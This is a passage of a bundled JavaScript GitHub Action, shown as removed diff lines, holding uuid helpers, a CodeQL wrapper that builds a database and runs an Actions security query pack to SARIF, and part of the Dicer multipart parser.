exports) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; -var _default = '00000000-0000-0000-0000-000000000000'; -exports["default"] = _default; - -/***/ }), - -/***/ 2746: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function parse(uuid) { - if (!(0, _validate.default)(uuid)) { - throw TypeError('Invalid UUID'); - } - - let v; - const arr = new Uint8Array(16); // Parse ########-....-....-....-............ - - arr[0] = (v = parseInt(uuid.slice(0, 8), 16)) >>> 24; - arr[1] = v >>> 16 & 0xff; - arr[2] = v >>> 8 & 0xff; - arr[3] = v & 0xff; // Parse ........-####-....-....-............ - - arr[4] = (v = parseInt(uuid.slice(9, 13), 16)) >>> 8; - arr[5] = v & 0xff; // Parse ........-....-####-....-............ - - arr[6] = (v = parseInt(uuid.slice(14, 18), 16)) >>> 8; - arr[7] = v & 0xff; // Parse ........-....-....-####-............ - - arr[8] = (v = parseInt(uuid.slice(19, 23), 16)) >>> 8; - arr[9] = v & 0xff; // Parse ........-....-....-....-############ - // (Use "/" to avoid 32-bit truncation when bit-shifting high-order bytes) - - arr[10] = (v = parseInt(uuid.slice(24, 36), 16)) / 0x10000000000 & 0xff; - arr[11] = v / 0x100000000 & 0xff; - arr[12] = v >>> 24 & 0xff; - arr[13] = v >>> 16 & 0xff; - arr[14] = v >>> 8 & 0xff; - arr[15] = v & 0xff; - return arr; -} - -var _default = parse; -exports["default"] = _default; - -/***/ }), - -/***/ 814: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; -var _default = /^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i; -exports["default"] = _default; - -/***/ }), - -/***/ 807: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = rng; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const rnds8Pool = new Uint8Array(256); // # of random values to pre-allocate - -let poolPtr = rnds8Pool.length; - -function rng() { - if (poolPtr > rnds8Pool.length - 16) { - _crypto.default.randomFillSync(rnds8Pool); - - poolPtr = 0; - } - - return rnds8Pool.slice(poolPtr, poolPtr += 16); -} - -/***/ }), - -/***/ 5274: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function sha1(bytes) { - if (Array.isArray(bytes)) { - bytes = Buffer.from(bytes); - } else if (typeof bytes === 'string') { - bytes = Buffer.from(bytes, 'utf8'); - } - - return _crypto.default.createHash('sha1').update(bytes).digest(); -} - -var _default = sha1; -exports["default"] = _default; - -/***/ }), - -/***/ 8950: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -/** - * Convert array of 16 byte values to UUID string format of the form: - * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX - */ -const byteToHex = []; - -for (let i = 0; i < 256; ++i) { - byteToHex.push((i + 0x100).toString(16).substr(1)); -} - -function stringify(arr, offset = 0) { - // Note: Be careful editing this code! It's been tuned for performance - // and works in ways you may not expect. See https://github.com/uuidjs/uuid/pull/434 - const uuid = (byteToHex[arr[offset + 0]] + byteToHex[arr[offset + 1]] + byteToHex[arr[offset + 2]] + byteToHex[arr[offset + 3]] + '-' + byteToHex[arr[offset + 4]] + byteToHex[arr[offset + 5]] + '-' + byteToHex[arr[offset + 6]] + byteToHex[arr[offset + 7]] + '-' + byteToHex[arr[offset + 8]] + byteToHex[arr[offset + 9]] + '-' + byteToHex[arr[offset + 10]] + byteToHex[arr[offset + 11]] + byteToHex[arr[offset + 12]] + byteToHex[arr[offset + 13]] + byteToHex[arr[offset + 14]] + byteToHex[arr[offset + 15]]).toLowerCase(); // Consistency check for valid UUID. If this throws, it's likely due to one - // of the following: - // - One or more input array values don't map to a hex octet (leading to - // "undefined" in the uuid) - // - Invalid input values for the RFC `version` or `variant` fields - - if (!(0, _validate.default)(uuid)) { - throw TypeError('Stringified UUID is invalid'); - } - - return uuid; -} - -var _default = stringify; -exports["default"] = _default; - -/***/ }), - -/***/ 8628: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _rng = _interopRequireDefault(__nccwpck_require__(807)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -// **`v1()` - Generate time-based UUID** -// -// Inspired by https://github.com/LiosK/UUID.js -// and http://docs.python.org/library/uuid.html -let _nodeId; - -let _clockseq; // Previous uuid creation time - - -let _lastMSecs = 0; -let _lastNSecs = 0; // See https://github.com/uuidjs/uuid for API details - -function v1(options, buf, offset) { - let i = buf && offset || 0; - const b = buf || new Array(16); - options = options || {}; - let node = options.node || _nodeId; - let clockseq = options.clockseq !== undefined ? options.clockseq : _clockseq; // node and clockseq need to be initialized to random values if they're not - // specified. We do this lazily to minimize issues related to insufficient - // system entropy. See #189 - - if (node == null || clockseq == null) { - const seedBytes = options.random || (options.rng || _rng.default)(); - - if (node == null) { - // Per 4.5, create and 48-bit node id, (47 random bits + multicast bit = 1) - node = _nodeId = [seedBytes[0] | 0x01, seedBytes[1], seedBytes[2], seedBytes[3], seedBytes[4], seedBytes[5]]; - } - - if (clockseq == null) { - // Per 4.2.2, randomize (14 bit) clockseq - clockseq = _clockseq = (seedBytes[6] << 8 | seedBytes[7]) & 0x3fff; - } - } // UUID timestamps are 100 nano-second units since the Gregorian epoch, - // (1582-10-15 00:00). JSNumbers aren't precise enough for this, so - // time is handled internally as 'msecs' (integer milliseconds) and 'nsecs' - // (100-nanoseconds offset from msecs) since unix epoch, 1970-01-01 00:00. - - - let msecs = options.msecs !== undefined ? options.msecs : Date.now(); // Per 4.2.1.2, use count of uuid's generated during the current clock - // cycle to simulate higher resolution clock - - let nsecs = options.nsecs !== undefined ? options.nsecs : _lastNSecs + 1; // Time since last uuid creation (in msecs) - - const dt = msecs - _lastMSecs + (nsecs - _lastNSecs) / 10000; // Per 4.2.1.2, Bump clockseq on clock regression - - if (dt < 0 && options.clockseq === undefined) { - clockseq = clockseq + 1 & 0x3fff; - } // Reset nsecs if clock regresses (new clockseq) or we've moved onto a new - // time interval - - - if ((dt < 0 || msecs > _lastMSecs) && options.nsecs === undefined) { - nsecs = 0; - } // Per 4.2.1.2 Throw error if too many uuids are requested - - - if (nsecs >= 10000) { - throw new Error("uuid.v1(): Can't create more than 10M uuids/sec"); - } - - _lastMSecs = msecs; - _lastNSecs = nsecs; - _clockseq = clockseq; // Per 4.1.4 - Convert from unix epoch to Gregorian epoch - - msecs += 12219292800000; // `time_low` - - const tl = ((msecs & 0xfffffff) * 10000 + nsecs) % 0x100000000; - b[i++] = tl >>> 24 & 0xff; - b[i++] = tl >>> 16 & 0xff; - b[i++] = tl >>> 8 & 0xff; - b[i++] = tl & 0xff; // `time_mid` - - const tmh = msecs / 0x100000000 * 10000 & 0xfffffff; - b[i++] = tmh >>> 8 & 0xff; - b[i++] = tmh & 0xff; // `time_high_and_version` - - b[i++] = tmh >>> 24 & 0xf | 0x10; // include version - - b[i++] = tmh >>> 16 & 0xff; // `clock_seq_hi_and_reserved` (Per 4.2.2 - include variant) - - b[i++] = clockseq >>> 8 | 0x80; // `clock_seq_low` - - b[i++] = clockseq & 0xff; // `node` - - for (let n = 0; n < 6; ++n) { - b[i + n] = node[n]; - } - - return buf || (0, _stringify.default)(b); -} - -var _default = v1; -exports["default"] = _default; - -/***/ }), - -/***/ 6409: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _v = _interopRequireDefault(__nccwpck_require__(5998)); - -var _md = _interopRequireDefault(__nccwpck_require__(4569)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const v3 = (0, _v.default)('v3', 0x30, _md.default); -var _default = v3; -exports["default"] = _default; - -/***/ }), - -/***/ 5998: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = _default; -exports.URL = exports.DNS = void 0; - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -var _parse = _interopRequireDefault(__nccwpck_require__(2746)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function stringToBytes(str) { - str = unescape(encodeURIComponent(str)); // UTF8 escape - - const bytes = []; - - for (let i = 0; i < str.length; ++i) { - bytes.push(str.charCodeAt(i)); - } - - return bytes; -} - -const DNS = '6ba7b810-9dad-11d1-80b4-00c04fd430c8'; -exports.DNS = DNS; -const URL = '6ba7b811-9dad-11d1-80b4-00c04fd430c8'; -exports.URL = URL; - -function _default(name, version, hashfunc) { - function generateUUID(value, namespace, buf, offset) { - if (typeof value === 'string') { - value = stringToBytes(value); - } - - if (typeof namespace === 'string') { - namespace = (0, _parse.default)(namespace); - } - - if (namespace.length !== 16) { - throw TypeError('Namespace must be array-like (16 iterable integer values, 0-255)'); - } // Compute hash of namespace and value, Per 4.3 - // Future: Use spread syntax when supported on all platforms, e.g. `bytes = - // hashfunc([...namespace, ... value])` - - - let bytes = new Uint8Array(16 + value.length); - bytes.set(namespace); - bytes.set(value, namespace.length); - bytes = hashfunc(bytes); - bytes[6] = bytes[6] & 0x0f | version; - bytes[8] = bytes[8] & 0x3f | 0x80; - - if (buf) { - offset = offset || 0; - - for (let i = 0; i < 16; ++i) { - buf[offset + i] = bytes[i]; - } - - return buf; - } - - return (0, _stringify.default)(bytes); - } // Function#name is not settable on some platforms (#270) - - - try { - generateUUID.name = name; // eslint-disable-next-line no-empty - } catch (err) {} // For CommonJS default export support - - - generateUUID.DNS = DNS; - generateUUID.URL = URL; - return generateUUID; -} - -/***/ }), - -/***/ 5122: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _rng = _interopRequireDefault(__nccwpck_require__(807)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function v4(options, buf, offset) { - options = options || {}; - - const rnds = options.random || (options.rng || _rng.default)(); // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` - - - rnds[6] = rnds[6] & 0x0f | 0x40; - rnds[8] = rnds[8] & 0x3f | 0x80; // Copy bytes to buffer, if provided - - if (buf) { - offset = offset || 0; - - for (let i = 0; i < 16; ++i) { - buf[offset + i] = rnds[i]; - } - - return buf; - } - - return (0, _stringify.default)(rnds); -} - -var _default = v4; -exports["default"] = _default; - -/***/ }), - -/***/ 9120: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _v = _interopRequireDefault(__nccwpck_require__(5998)); - -var _sha = _interopRequireDefault(__nccwpck_require__(5274)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const v5 = (0, _v.default)('v5', 0x50, _sha.default); -var _default = v5; -exports["default"] = _default; - -/***/ }), - -/***/ 6900: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _regex = _interopRequireDefault(__nccwpck_require__(814)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function validate(uuid) { - return typeof uuid === 'string' && _regex.default.test(uuid); -} - -var _default = validate; -exports["default"] = _default; - -/***/ }), - -/***/ 1595: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function version(uuid) { - if (!(0, _validate.default)(uuid)) { - throw TypeError('Invalid UUID'); - } - - return parseInt(uuid.substr(14, 1), 16); -} - -var _default = version; -exports["default"] = _default; - -/***/ }), - -/***/ 950: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; -const fs = __importStar(__nccwpck_require__(7147)); -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const toolcache = __importStar(__nccwpck_require__(7784)); -const toolrunner = __importStar(__nccwpck_require__(8159)); -async function newCodeQL() { - return { - language: "javascript", - path: await findCodeQL(), - pack: "github/actions-queries", - suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, - source_root: core.getInput("source-root"), - output: core.getInput("sarif"), - packs: core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, - }; -} -exports.newCodeQL = newCodeQL; -async function runCommand(config, args, cwd_arg) { - var bin = path.join(config.path, "codeql"); - let output = ""; - var cwd = process.cwd(); - if (cwd_arg) { - cwd = cwd_arg; - } - core.info("Current working directory: " + cwd); - var options = { - cwd: cwd, - listeners: { - stdout: (data) => { - output += data.toString(); - }, - }, - }; - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - return output.trim(); -} -exports.runCommand = runCommand; -async function runCommandJson(config, args) { - return JSON.parse(await runCommand(config, args)); -} -exports.runCommandJson = runCommandJson; -async function findCodeQL() { - // check if codeql is in the toolcache - var codeqlPath = await findCodeQlInToolcache(); - if (codeqlPath !== undefined) { - return codeqlPath; - } - // default to the codeql in the path - return "codeql"; -} -async function findCodeQlInToolcache() { - const candidates = toolcache - .findAllVersions("CodeQL") - .map((version) => ({ - folder: toolcache.find("CodeQL", version), - version, - })) - .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); - if (candidates.length === 1) { - const candidate = candidates[0]; - core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); - core.debug(`CodeQL toolcache version: '${candidate.version}'.`); - return path.join(candidate.folder, "codeql"); - } - core.warning(`No CodeQL tools found in toolcache.`); - return undefined; -} -async function downloadPack(codeql) { - try { - await runCommand(codeql, ["pack", "download", codeql.pack]); - return true; - } - catch (error) { - core.warning("Failed to download pack from GitHub..."); - } - return false; -} -exports.downloadPack = downloadPack; -async function codeqlDatabaseCreate(codeql) { - // get runner temp directory for database - var temp = process.env["RUNNER_TEMP"]; - if (temp === undefined) { - temp = "/tmp"; - } - var database_path = path.join(temp, "codeql-actions-db"); - var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - await runCommand(codeql, [ - "database", - "create", - "--language", - codeql.language, - "--source-root", - source_root, - database_path, - ]); - return database_path; -} -exports.codeqlDatabaseCreate = codeqlDatabaseCreate; -async function codeqlDatabaseAnalyze(codeql, database_path) { - var codeql_output = codeql.output || "codeql-actions.sarif"; - var cmd = [ - "database", - "analyze", - "--format", - "sarif-latest", - "--sarif-add-query-help", - "--output", - codeql_output, - ]; - if (codeql.packs !== undefined) { - cmd.push("--extension-packs", codeql.packs); - } - // remote pack or local pack - if (codeql.pack.startsWith("githubsecuritylab/")) { - var suite = codeql.pack + ":" + codeql.suite; - } - else { - // assume path - var suite = path.join(codeql.pack, codeql.suite); - cmd.push("--search-path", codeql.pack); - } - cmd.push(database_path, suite); - await runCommand(codeql, cmd); - return codeql_output; -} -exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; - - -/***/ }), - -/***/ 6144: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.run = void 0; -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const cql = __importStar(__nccwpck_require__(950)); -/** - * The main function for the action. - * @returns {Promise} Resolves when the action is complete. - */ -async function run() { - try { - // set up codeql - var codeql = await cql.newCodeQL(); - core.debug(`CodeQL CLI found at '${codeql.path}'`); - await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check javascript support - var languages = await cql.runCommandJson(codeql, [ - "resolve", - "languages", - "--format", - "json", - ]); - if (!languages.hasOwnProperty("javascript")) { - core.setFailed("CodeQL javascript extractor not installed"); - throw new Error("CodeQL javascript extractor not installed"); - } - // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } - else { - core.info(`Pack downloaded '${codeql.pack}'`); - } - core.info("Creating CodeQL database..."); - var database_path = await cql.codeqlDatabaseCreate(codeql); - core.info("Running CodeQL analysis..."); - var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); - core.info(`SARIF results: '${sarif}'`); - core.setOutput("sarif", sarif); - core.info("Finished CodeQL analysis"); - } - catch (error) { - // Fail the workflow run if an error occurs - if (error instanceof Error) - core.setFailed(error.message); - } -} -exports.run = run; -// eslint-disable-next-line @typescript-eslint/no-floating-promises -run(); - - -/***/ }), - -/***/ 9491: -/***/ ((module) => { - -"use strict"; -module.exports = require("assert"); - -/***/ }), - -/***/ 852: -/***/ ((module) => { - -"use strict"; -module.exports = require("async_hooks"); - -/***/ }), - -/***/ 4300: -/***/ ((module) => { - -"use strict"; -module.exports = require("buffer"); - -/***/ }), - -/***/ 2081: -/***/ ((module) => { - -"use strict"; -module.exports = require("child_process"); - -/***/ }), - -/***/ 6206: -/***/ ((module) => { - -"use strict"; -module.exports = require("console"); - -/***/ }), - -/***/ 6113: -/***/ ((module) => { - -"use strict"; -module.exports = require("crypto"); - -/***/ }), - -/***/ 7643: -/***/ ((module) => { - -"use strict"; -module.exports = require("diagnostics_channel"); - -/***/ }), - -/***/ 2361: -/***/ ((module) => { - -"use strict"; -module.exports = require("events"); - -/***/ }), - -/***/ 7147: -/***/ ((module) => { - -"use strict"; -module.exports = require("fs"); - -/***/ }), - -/***/ 3685: -/***/ ((module) => { - -"use strict"; -module.exports = require("http"); - -/***/ }), - -/***/ 5158: -/***/ ((module) => { - -"use strict"; -module.exports = require("http2"); - -/***/ }), - -/***/ 5687: -/***/ ((module) => { - -"use strict"; -module.exports = require("https"); - -/***/ }), - -/***/ 1808: -/***/ ((module) => { - -"use strict"; -module.exports = require("net"); - -/***/ }), - -/***/ 5673: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:events"); - -/***/ }), - -/***/ 4492: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:stream"); - -/***/ }), - -/***/ 7261: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:util"); - -/***/ }), - -/***/ 2037: -/***/ ((module) => { - -"use strict"; -module.exports = require("os"); - -/***/ }), - -/***/ 1017: -/***/ ((module) => { - -"use strict"; -module.exports = require("path"); - -/***/ }), - -/***/ 4074: -/***/ ((module) => { - -"use strict"; -module.exports = require("perf_hooks"); - -/***/ }), - -/***/ 3477: -/***/ ((module) => { - -"use strict"; -module.exports = require("querystring"); - -/***/ }), - -/***/ 2781: -/***/ ((module) => { - -"use strict"; -module.exports = require("stream"); - -/***/ }), - -/***/ 5356: -/***/ ((module) => { - -"use strict"; -module.exports = require("stream/web"); - -/***/ }), - -/***/ 1576: -/***/ ((module) => { - -"use strict"; -module.exports = require("string_decoder"); - -/***/ }), - -/***/ 9512: -/***/ ((module) => { - -"use strict"; -module.exports = require("timers"); - -/***/ }), - -/***/ 4404: -/***/ ((module) => { - -"use strict"; -module.exports = require("tls"); - -/***/ }), - -/***/ 7310: -/***/ ((module) => { - -"use strict"; -module.exports = require("url"); - -/***/ }), - -/***/ 3837: -/***/ ((module) => { - -"use strict"; -module.exports = require("util"); - -/***/ }), - -/***/ 9830: -/***/ ((module) => { - -"use strict"; -module.exports = require("util/types"); - -/***/ }), - -/***/ 1267: -/***/ ((module) => { - -"use strict"; -module.exports = require("worker_threads"); - -/***/ }), - -/***/ 9796: -/***/ ((module) => { - -"use strict"; -module.exports = require("zlib"); - -/***/ }), - -/***/ 2960: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const WritableStream = (__nccwpck_require__(4492).Writable) -const inherits = (__nccwpck_require__(7261).inherits) - -const StreamSearch = __nccwpck_require__(1142) - -const PartStream = __nccwpck_require__(1620) -const HeaderParser = __nccwpck_require__(2032) - -const DASH = 45 -const B_ONEDASH = Buffer.from('-') -const B_CRLF = Buffer.from('\r\n') -const EMPTY_FN = function () {} - -function Dicer (cfg) { - if (!(this instanceof Dicer)) { return new Dicer(cfg) } - WritableStream.call(this, cfg) - - if (!cfg || (!cfg.headerFirst && typeof cfg.boundary !== 'string')) { throw new TypeError('Boundary required') } - - if (typeof cfg.boundary === 'string') { this.setBoundary(cfg.boundary) } else { this._bparser = undefined } - - this._headerFirst = cfg.headerFirst - - this._dashes = 0 - this._parts = 0 - this._finished = false - this._realFinish = false - this._isPreamble = true - this._justMatched = false - this._firstWrite = true - this._inHeader = true - this._part = undefined - this._cb = undefined - this._ignoreData = false - this._partOpts = { highWaterMark: cfg.partHwm } - this._pause = false - - const self = this - this._hparser = new HeaderParser(cfg) - this._hparser.on('header', function (header) { - self._inHeader = false - self._part.emit('header', header) - }) -} -inherits(Dicer, WritableStream) - -Dicer.prototype.emit = function (ev) { - if (ev === 'finish' && !this._realFinish) { - if (!this._finished) { - const self = this - process.nextTick(function () { - self.emit('error', new Error('Unexpected end of multipart data')) - if (self._part && !self._ignoreData) { - const type = (self._isPreamble ? 'Preamble' : 'Part') - self._part.emit('error', new Error(type + ' terminated early due to unexpected end of multipart data')) - self._part.push(null) - process.nextTick(function () { - self._realFinish = true - self.emit('finish') - self._realFinish = false - }) - return - } - self._realFinish = true - self.emit('finish') - self._realFinish = false - }) - } - } else { WritableStream.prototype.emit.apply(this, arguments) } -} - -Dicer.prototype._write = function (data, encoding, cb) { - // ignore unexpected data (e.g. extra trailer data after finished) - if (!this._hparser && !this._bparser) { return cb() } - - if (this._headerFirst && this._isPreamble) { - if (!this._part) { - this._part = new PartStream(this._partOpts) - if (this._events.preamble) { this.emit('preamble', this._part) } else { this._ignore() } - } - const r = this._hparser.push(data) - if (!this._inHeader && r !== undefined && r < data.length) { data = data.slice(r) } else { return cb() } - } - - // allows for "easier" testing - if (this._firstWrite) { - this._bparser.push(B_CRLF) - this._firstWrite = false - } - - this._bparser.push(data) - - if (this._pause) { this._cb = cb } else { cb() } -} - -Dicer.prototype.reset = function () { - this._part = undefined - this._bparser = undefined - this._hparser = undefined -} - -Dicer.prototype.setBoundary = function (boundary) { - const self = this - this._bparser = new StreamSearch('\r\n--' + boundary) - this._bparser.on('info', function (isMatch, data, start, end) { - self._oninfo(isMatch, data, start, end) - }) -} - -Dicer.prototype._ignore = function () { - if (this._part && !this._ignoreData) { - this._ignoreData = true - this._part.on('error', EMPTY_FN) - // we must perform some kind of read on the stream even though we are - // ignoring the data, otherwise node's Readable stream will not emit 'end' - // after pushing null to the stream - this._part.resume() - } -} - -Dicer.prototype._oninfo = function (isMatch, data, start, end) { - let buf; const self = this; let i = 0; let r; let shouldWriteMore = true - - if (!this._part && this._justMatched && data) { - while (this._dashes < 2 && (start + i) < end) { - if (data[start + i] === DASH) { - ++i - ++this._dashes - } else { - if (this._dashes) { buf = B_ONEDASH } - this._dashes = 0 - break - } - } - if (this._dashes === 2) { - if ((start + i) < end && this._events.trailer) { this.emit('trailer', data.slice(start + i, end)) } - this.reset() - this._finished = true - // no more parts will be added - if (self._parts === 0) { - self._realFinish = true - self.emit('finish') - self._realFinish = false - } - } - if (this._dashes) { return } - } - if (this._justMatched) { this._justMatched = false } - if (!this._part) { - this._part = new PartStream(this._partOpts) - this._part._read = function (n) { - self._unpause() - } - if (this._isPreamble && this._events.preamble) { this.emit('preamble', this._part) } else if (this._isPreamble !== true && this._events.part) { this.emit('part', this._part) } else { this._ignore() } - if (!this._isPreamble) { this._inHeader = true } - } - if (data && start < end && !this._ignoreData) { - if (this._isPreamble || !this._inHeader) { - if (buf) { shouldWriteMore = this._part.push(buf) } - shouldWriteMore = this._part.push(data.slice(start, end)) - if (!shouldWriteMore) { this._pause = true } - } else if (!this._isPreamble && this._inHeader) { - if (buf) { this._hparser.push(buf) } - r = this._hparser.push(data.slice(start, end)) - if (!this._inHeader && r !== undefined && r < end) { this._oninfo(false, data, start + r, end) } - } - } - if (isMatch) { - this._hparser.reset() - if (this._isPreamble) { this._isPreamble = false } else { - if (start !== end) { - ++this._parts - this._part.on('end', function () { - if (--self._parts === 0) { - if (self._finished) { - self._realFinish = true - self.emit('finish') - self._realFinish = false - } else { - self._unpause() - } - } - }) - } - } - this._part.push(null) - this._part = undefined - this._ignoreData = false - this._justMatched = true - this._dashes = 0 - } -} - -Dicer.prototype._unpause = function () { - if (!this._pause) { return } - - this._pause = false - if (this._cb) { - const cb = this._cb - this._cb = undefined - cb() - } -} - -module.exports = Dicer - - -/***/ }), - -/***/ 2032: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const EventEmitter = (__nccwpck_require__(5673).EventEmitter) -const inherits = (__nccwpck_require__(7261).inherits) -const getLimit = __nccwpck_require__(1467) - -const StreamSearch = __nccwpck_require__(1142) - -const B_DCRLF = Buffer.from('\r\n\r\n') -const RE_CRLF = /\r\n/g -const RE_HDR = /^([^:]+):[ \t]?([\x00-\xFF]+)?$/ // eslint-disable-line no-control-regex - -function HeaderParser (cfg) { - EventEmitter.call(this) - - cfg = cfg || {} - const self = this - this.nread = 0 - this.maxed = false - this.npairs = 0 - this.maxHeaderPairs = getLimit(cfg, 'maxHeaderPairs', 2000) - this.maxHeaderSize = getLimit(cfg, 'maxHeaderSize', 80 * 1024) - this.buffer = '' - this.header = {} - this.finished = false - this.ss = new StreamSearch(B_DCRLF) - this.ss.on('info', function (isMatch, data, start, end) { - if (data && !self.maxed) { - if (self.nread + end - start >= self.maxHeaderSize) { - end = self.maxHeaderSize - self.nread + start - self.nread = self.maxHeaderSize - self.maxed = true - } else { self.nread += (end - start) } - - self.buffer += data.toString('binary', start, end) - } - if (isMatch) { self._finish() } - }) -} -inherits(HeaderParser, EventEmitter) - -HeaderParser.prototype.push = function (data) { - const r = this.ss.push(data) - if (this.finished) { return r } -} - -HeaderParser.prototype.reset = function () { - this.finished = false - this.buffer = '' - this.header = {} - this.ss.reset() -} - -HeaderParser.prototype._finish = function () { - if (this.buffer) { this._parseHeader() } - this.ss.matches = this.ss.maxMatches - const header = this.header - this.header = {} - this.buffer = '' - this.finished = true - this.nread 